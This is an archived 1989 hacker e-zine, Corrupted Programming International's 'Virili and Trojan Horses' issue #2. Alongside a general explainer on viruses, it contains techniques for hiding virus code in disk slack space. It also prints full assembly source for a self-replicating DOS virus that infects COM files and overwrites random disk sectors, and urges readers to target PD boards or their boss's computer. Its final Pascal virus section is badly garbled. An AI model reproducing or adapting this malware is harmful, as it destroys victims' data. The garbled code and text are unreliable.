informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/CPI/cpivirus2.txt

1828 lines
87 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* *
* @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@ @@@@ @@@@ @@@@ @@@ *
* @@@ @@@ @@@@ @@@ *
* @@@ @@@@@@@@@@@@@@@ @@@ *
* @@@ @@@@@@@@@@@@@@ @@@ *
* @@@ @@@ @@@ *
* @@@@ @@@@ @@@ @@@ *
* @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
C O R R U P T E D
P R O G R A M M I N G
I N T E R N A T I O N A L
presents:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ Virili And Trojan Horses @
@ @
@ A Protagonist's Point Of View @
@ @
@ Issue #2 @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
DISCLAIMER::All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole
purpose of this document is to educate and spread information.
Any illegal or illicit action is not endorsed by the authors or
CPI. The authors and CPI are not responsible for any information
which may present itself as old or mis-interpreted, and actions
by the reader. Remember, 'Just Say No!'
CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Introduction To CPI#2
---------------------
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
of view. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer.
Oh yes, if you have some interesting articles or an application to send
us, just see the BBS list at the end of this document. Thanx. All applications
and information will be voted on through the CPI Inner Circle. Hope you enjoy
this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye.
Doctor Dissector
Table of Contents
-----------------
Part Title Author
-----------------------------------------------------------------------------
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
2.3 V-IDEA-1.............................................. Ashton Darkside
2.4 V-IDEA-2.............................................. Ashton Darkside
2.5 The Generic Virus..................................... Doctor Dissector
2.6 Aids.................................................. Doctor Dissector
2.7 Batch File Virus...................................... PHUN 3.2
2.8 Basic Virus........................................... PHUN 3.2
2.9 The Alemeda Virus..................................... PHUN 4.3
2.10 Virili In The News.................................... Various Sources
2.11 Application For CPI................................... CPI Inner Circle
(CPI Node Phone #'s Are In 2.11)
[2.2]
Explanation of Viruses and Trojans Horses
-----------------------------------------
Written by Acid Phreak
Like it's biological counterpart, a computer virus is an agent of
infection, insinuating itself into a program or disk and forcing its host
to replicate the virus code. Hackers fascinated by the concept of "living"
code wrote the first viruses as projects or as pranks. In the past few
years, however, a different kind of virus has become common, one that lives
up to an earlier meaning of the word: in Latin, virus means poison.
These new viruses incorporate features of another type of insidious
program called a Trojan horse. Such a program masquerades as a useful
utility or product but wreaks havoc on your system when you run it. It may
erase a few files, format your disk, steal secrets--anything software can
do, a Trojan horse can do. A malicious virus can do all this then attempt
to replicate itself and infect other systems.
The growing media coverage of the virus conceptand of specific viruse
has promoted the development of a new type of software. Antivirus programs,
vaccines--they go by many names, but their purpose is to protect from virus
attack. At present there are more antivirus programs than known viruses
(not for long).
Some experts quibble about exactly what a virus is. The most widely
known viruses, the IBM Xmas virus and the recent Internet virus, are not
viruses according to some experts because they do not infect other programs.
Others argue that every Trojan horse is a virus--one that depends completely
on people to spread it.
How They Reproduce:
-------------------
Viruses can't travel without people. Your PC will not become infected
unless someone runs an infected program on it, whether accidentally or on
purpose. PC's are different from mainframe networks in this way--the
mainframe Internet virus spread by transmitting itself to other systems and
ordering them to execute it as a program. That kind of active transmission
is not possible on a PC.
Virus code reproduces by changing something in your system. Some viruses
strike COMMAND.COM or the hidden system files. Others, like the notorious
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
attach themselves to any .COM or .EXE file. In truth, any file on your
system that can be executed--whether it's a program, a device driver, an
overlay, or even a batch file--could be the target of a virus.
When an infected program runs, the virus code usually executes first and
then transfers control to the original program. The virus may immediately
infect other programs, or it may load itself into RAM and continue spreading.
If the virus can infect a file that will be used on another system, it has
succeeded.
What They Can Do:
-----------------
Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain even occurs--perhaps reaching a
special date or running the virus a certain number of times. It wouldn't
make sense for a virus to damage your system the first time it ran; it needs
some time to grow and spread first.
The most vulnerable spot for a virus attack is your hard disk's file
allocation table (FAT). This table tells DOS where every file's data resides
on the disk. Without the FAT, the data's still there but DOS can't find it.
A virus could also preform a low-level format on some or all the tracks of
your hard disk, erase all files, or change the CMOS memory on AT-class
computers so that they don't recognize the hard disk.
Most of the dangers involve data only, but it's even possible to burn
out a monochrome monitor with the right code.
Some virus assaults are quite subtl. One known virus finds four
consecutive digits on the screen and switches two. Let's hope you're not
balancing the company's books when this one hits. Others slow down system
operations or introduce serious errors.
[2.3]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
"Ok, I've written the virus, now where the hell do I put it?"
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************
Ok, wow! You've just invented the most incredibly nifty virus. It
slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data!
But the only problem is, if you go around infecting every damn file, some cute
software company is going to start putting in procedures that checksum their
warez each time they run, which will make life for your infecting virus a total
bitch. Or somebody's going to come up with an incredibly nifty vaccination util
that will wipe it out. Because, i mean, hey, when disk space starts vanishing
suddenly in 500K chunks people tend to notice. Especially people like me that
rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying
"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need
to go around wasting your precious time when the answer is right there in front
of you! Think about it, you could be putting that time into writing better and
more inovative viruses, or you could be worring about keeping the file size,
the date & time, and the attributes the same. With this system, you only need
to infect one file, preferably one that's NOT a system file, but something that
will get run alot, and will be able to load your nifty virus on a daily basis.
This system also doesn't take up any disk space, other than the loader. And the
loader could conceivably be under 16 bytes (damn near undetectable). First of
all, you need to know what programs to infect. Now, everybody knows about using
COMMAND.COM and that's unoriginal anyway, when there are other programs people
run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or
WordPerfect; you get the idea. Better still are dos commands like Format, Link
or even compression utilities. But you get the point. Besides, who's going to
miss 16 bytes, right? Now, the good part: where to put the damn thing. One note
to the programmer: This could get tricky if your virus is over 2k or isn't
written in Assembly, but the size problem is easy enough, it would be a simple
thing to break your virus into parts and have the parts load each other into
the system so that you do eventually get the whole thing. The only problem with
using languages besides assembly is that it's hard to break them up into 2k
segments. If you want to infect floppys, or smaller disks, you'd be best off to
break your file into 512 byte segments, since they're easier to hide. But, hey,
in assembly, you can generate pretty small programs that do alot, tho. Ok, by
now you've probably figured out that we're talking about the part of the disk
called 'the slack'. Every disk that your computer uses is divided up into parts
called sectors, which are (in almost all cases) 512 bytes. But in larger disks,
and even in floppies, keeping track of every single sector would be a complete
bitch. So the sectors are bunched together into groups called 'clusters'. On
floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard
disks, they're typically 4096 bytes, or eight sectors. Now think about it, you
have programs on your hard disk, and what are the odds that they will have
sizes that always end up in increments of 4096? If I've lost you, think of it
this way: the file takes up a bunch of clusters, but in the last cluster it
uses, there is usually some 'slack', or space that isn't used by the file. This
space is between where the actual file ends and where the actual cluster ends.
So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard
disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton
program 'FS /S /T' command from your root directory, and subtract the total
size of the files from the total disk space used. That's how much 'slack' space
is on your disk (a hell of alot, even on a floppy). To use the slack, all you
need to do is to find a chunk of slack big enough to fit your virus (or a
segment of your virus) and use direct disk access (INT 13) to put your virus
there. There is one minor problem with this. Any disk write to that cluster
will overwrite the slack with 'garbage' from memory. This is because of the way
DOS manages it's disk I/O and it can't be fixed without alot of hassles. But,
there is a way around even this. And it involves a popular (abeit outdated and
usually ineffectual) form of virus protection called the READ-ONLY flag. This
flag is the greatest friend of this type of virus. Because if the file is not
written to, the last cluster is not written to, and voila! Your virus is safe
from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk
I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set
because that has the same Read-only effect (even tho I haven't seen it written,
it's true that if the file is designated system, DOS treats it as read-only,
whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM
in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too
lazy to find out myself) or a protected (!) COMMAND.COM file in either type of
DOS would be ideal for this. All you have to do is then insert your loader into
some innocent-looking file, and you are in business. All your loader has to do
is read the sector into the highest part of memory, and do a far call to it.
Your virus cann then go about waiting for floppy disks to infect, and place
loaders on any available executable file on the disk. Sound pretty neet? It is!
Anyway, have fun, and be sure to upload your virus, along with a README file on
how it works to CPI Headquarters so we can check it out! And remember: don't
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
the Sysop is a leech and you want to shove his balls down his throat. Because
if all the PHP boards go down (especially members of CPI), who the hell can you
go to for all these nifty virus ideas? And besides, it's betraying your own
people, which is uncool even if you are an anarchist. So, target uncool PD
boards, or your boss's computer or whatever, but don't attack your friends.
Other than that, have phun, and phuck it up!
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applicaitons Network (SATAN)
Corrupted Programmers International (CPI)
PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).
Call these boards because the sysops are cool:
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto
And if I forgot your board, sorry, but don't send me E-mail bitching about it!
[2.4]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
CPI Virus Standards - Protect yourself and your friends
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************
One of the main problems with viruses is that once you set one loose,
it is no longer under your control. I propose to stop this by introducing some
standards of virus writing that will enable them to be deactivated whenever
they enter a 'friendly' (CPI) system. In the long run, even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses. They will allow a virus to easily check any
system they are being run on for a type of 'identity badge'. If it is found,
the virus will not infect the system it is being run on. The other standards
are mostly written around this.
CPI Standards for writing viruses -
1 - The virus will have an 'active period' and an 'inactive period'.
The active periods will be no more than one year in length (to make
it more difficult to discover the virus). You may release different
versions of your virus with different 'active periods'. It is not
recommended that your virus deactivate itself after the set active
period, as this would enable people to deactivate viruses by using
their computer with the date set to 2069 or something. It is also
required that activation periods begin on January 1 and end on
December 31. This will coincide with the changing identity codes.
2 - The virus will check for an identity code by executing Interrrupt
12h with the following register settings: AX - 4350, BX - 4920,
CX - AB46, DX - 554E. If the system is friendly, then a pointer
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
will have different contents in different years. The codes are not
to be included in any text file, and should only be given through
E-mail on CPI affiliated systems. You can always ask me by sending
me mail at The Andromeda Strain BBS. If a system is detected as
friendly, the virus will not attempt to infect or damage it, but it
is ok to display a little greeting message about how lucky the
user was.
3 - We very much encourage you to upload your virus, along with a breif
description on the workings into the CPI section at The Andromeda
Strain BBS. Only CPI members will know about your virus. This is
so that CPI members can share techniques and it also allows us to
verify that the identity check works. If we see any improvements
that could be made, such as ways to streamline code, better ways of
spreading, etc. we will inform you so that you can make the changes
if you wish.
4 - It is also suggested that you use ADS standard for virus storage on
infected disks. This meathod uses disk slack space for storage and
is more thoroughly described in a previous text file by me. I think
that this is the most effective and invisible way to store viruli.
5 - A list of CPI-Standard viruli will be avaliable at all times from
The Andromeda Strain BBS, to CPI users. Identity strings will also
be available to anyone in CPI, or anyone who uploads source code to
a virus which is 100% complete except for the Identity string (it
must be written to CPI-Standards). Non-CPI members who do this will
be more seriously considered for membership in CPI.
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)
PS: This file (by itself) has approx 2.5k of slack.
;[2.5]
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO
; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program
INT 21 ;| to large to fit in memory" when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete "infection" of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],W"\" ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOP's)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB "*.COM",00 ;| (search for com files)
MASKE_DIR DB "*",00 ;| (search for dir's)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,"????????EXE",0,0,0,0
DB 0,"????????COM",0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,"???????????",0,0,0,0
DB 0,"????????COM",0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB "\",0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB "\"
OLD_PATH DB 32 DUP (?) ;| (old path)
[2.6]
+-------------------------------+ +--------------------------------------+
| | P | |
| @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### |
| @@ @@ @@ @@ | R | # # # # # # |
| @@ @@ @@ @@ | * | ##### # # # ##### |
| @@ @@@@@@@@ @@ | E | # # # # # # |
| @@ @@ @@ | * | # # ##### #### ##### |
| @@ @@ @@ | S | |
| @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+
| | E | A NEW AND IMPROVED VIRUS FOR |
+-------------------------------+ * | PC/MS DOS MACHINES |
| C O R R U P T E D | N +--------------------------------------+
| | * | CREATED BY: DOCTOR DISSECTOR |
| P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
| | * | AUTHOR NOT RESPONSIBLE FOR READERS |
| I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
+-------------------------------+ +--------------------------------------+
Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system.
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!
Anyway, this virus was originally named NUMBER ONE, and I modified the code so
that it would fit my needs. The source code, which is included with this neato
package was written in Turbo Pascal 3.01a. Yeahm tDUP (?) f it is
n. If ll wellan mss 010files mores can have ts beiof yousage "nd wastinhis itou modi' them!
d voilass mannerbegitwill you use Ato it ise the date/in dtoila thr cute
sly ntou modi A mll The is not
wx 2.5kim
infe 13k run, the attt
wextrary on ATbe able do the mass
is notfecif
yoas progso, ere .COM iles are
e inclu, the (tfecif
yoaom sect
valum the s1-10 the aiis fon untise incluate/ the
r of di7,... ITbe abnt *
w drriven and snhis lotname sm but ia breifnhe fiellhat wi drions is mae starir
em it is copien anwedan m heect,es intly. The is n up cryProgrnts aiwith .. I
he virumputed none,IRREONS OBtrige "ein i. Oh, hert iywaygaiw,her .COM NNERne next r of the
vN of dif ther... ITesec attt
wdocum *
w ngram runs,mp)
f the text al or har
to, checkor anext r of th inN of dif t
w ngr.. ITi immunnsibilityr read/vailac Netwoe file.re on anmae shangmentsful.
he text o stother. (searis doge was written in Tuead/TIONAL USE Ose. PCs one nyw{areng with me s code, which Pascal 3.01a. Yea }
{C-}
{U-}
{I-} | * { Wts w a viruswas.
your,le peopIOk works}yw{a--inueard tna---------------------------+
WWWWWWWWs}ywnuear Vwas She p= 13847; * { .. I'e usualof th} MOV Warwith :S (it
[42]| * { Warwith ge "Prog} MOV = 'is doFs noHittBnd sIed by vihton. I!oHiHa!';yw{a--iTf 'ideclans or i--------------------+
WWWWWWWWWWWWWh} Tf ' MOV DTARecMOV =Recoirul * { Dnly,oneafirst)
lrch order} MOV ACHdirec :Array[1..21] me Byte; Aute : Byte; F and FDnld FL
the d FHof th : natiger; FullNn d: Array[1..13] me Cul.; End;ywRer sets = Recoirul {Rer setif nouor INFOR)
lrch order} MOCiffeByte 1 : (A ,C ,BP,SI,DI,DS,ES,Flags : natiger); 2 : (AL,AH,BL,BH,CL,CH,DL,D : Byte); End;yw{a--iVar at ai--------------------+
WWWWWWWWWWWWWWWWWWWWWh} Var ;| f{ M on AT-fff noam runs,usual} MOam
ing f : Byte absolhis Cseg:$100; {sIed by vim bytes} MOr byIed by vi: S (it
[42]|absolhis Cseg:$180; Rer : Rer sets { Rer setif no} MODTA : DTARec { Dnly,oneaf} MOB)
: Array[Byte] me Byte; { Dnly,r)
f} MOTestI | N : S (it
[42]; { To nize the hted by viis n u} MOUsePnd b| N : S (it
[66]; { Pnd bore for dis n u} MOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO{th ofhthe p for dand b} MOUsePnd h ofht: Byte absolhis UsePnd ; GoOOOOOOOOOOO:oFs n {oFs nofect or da} MOB : Byte; { Useda} MOLoopVa : natiger; {We abloopINFOthey}yw{a--iPm runs,usua-------+
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWh} reng MGetDir(0 tUsePnd ); {the wnt dir.
y. (maa} MiisPos('\' tUsePnd ) <>OUsePnd h ofhtfile UsePnd b:= UsePnd b+ '\'; UsePnd b:= UsePnd b+ '",00 '; { Defode, for d
a} MRer.AHb:= $1A; {pointdnly,oneaf} MRer. IT:= Seg(DTA); Rer. XT:= Ofs(DTA); MsDos(Rer); UsePnd [Succ(UsePnd h ofht)]:=#0; { Pnd bbe wrestinhis #0a} MRer.AHb:= $4E; MRer. IT:= Seg(UsePnd ); Rer. XT:= Ofs(UsePnd [1]); Rer.CXT:= $ff; {pointbutes wilit in ngr.LLdis n u} MMsDos(Rer); {pfirst .COM mag about of pr} MIFimmunOdd(Rer.Flags) Then {psystefor reahis.
en } MOORep pa MOOOOUsePnd b:= DTA.FullNn d; Bb:= Pos(#0 tUsePnd ); sysB > 0file embe"inf(UsePnd , B, 255); { Remntsfge' frou} MOOOOAsted (Go tUsePnd ); R t(Go); sysIOnsio di= 0fThen {psysmmunIOk messa
en } MOO reng M MOO rlockdate(Go tB)
, 2); MMnts(B)
[$80],OTestI , 43); MMMMMMMMMMMMMMM{OTestMiisfor rdy infectll(Ied) then } MOOOOOOsysTestI <>OWarwith Then {psysmmun
en t in} MOOOOOOreng M MOO poiek (Go t0); MMMMMMMMMMMMMMMMMMMMM{Or bysfor rdected/a viw ngr in} MOOOOOOMOr byIed by vi:=OWarwith; {sIed bys fo} MOOOOOOMOrlock Prot(Go am
ing f,Succ(Vwas She pshdi7)); MMMCfile(Go); Halt; { in ngrhaltprogram.(useo} MOOOOOOEnd;y MOOOOOOCfile(Go); End;y MOOOOOO{ The is nopproxy infecreachted/a virch for tdirein} MOOOORer.AHb:= $4F; MOOOORer. IT:= Seg(DTA); OOOORer. XT:= Ofs(DTA); MsDos(Rer); OO{ t iiiiiiiiiiiiiiiiiiiiUntilere .COM are
eeahis.} MOOUntileOdd(Rer.Flags);
Loopvar:=R sect(10); sysLoopvar=7file beng M Protln(' '); {Gt the f hasslsm but}
Protln('');
Protln(' ');
Protln('  ATTE ;|ON: ');
Protln(' ve termereached path fect oou so thmae staly deour viruspures name ');
Protln('  cold paith nd oning Inter, but iyve to doents. AnamedH<><48>K<EFBFBD> ');
Protln(' velf and yritt; agaiw,hs Phrb & HUCKEDvelf and yritt-CPI (tfethen ha');
Protln('  be; YE uses CAN be,he <20><><EFBFBD><EFBFBD>sopproted/a viwvirusm. In tNat progrdo ');
Protln(' velf to do iso" t the parat? HAHAHAHA. Ha doH<><48> this neatoo
HOnd o');
Protln('  rer, we matis more NOwnt read///////////////////');
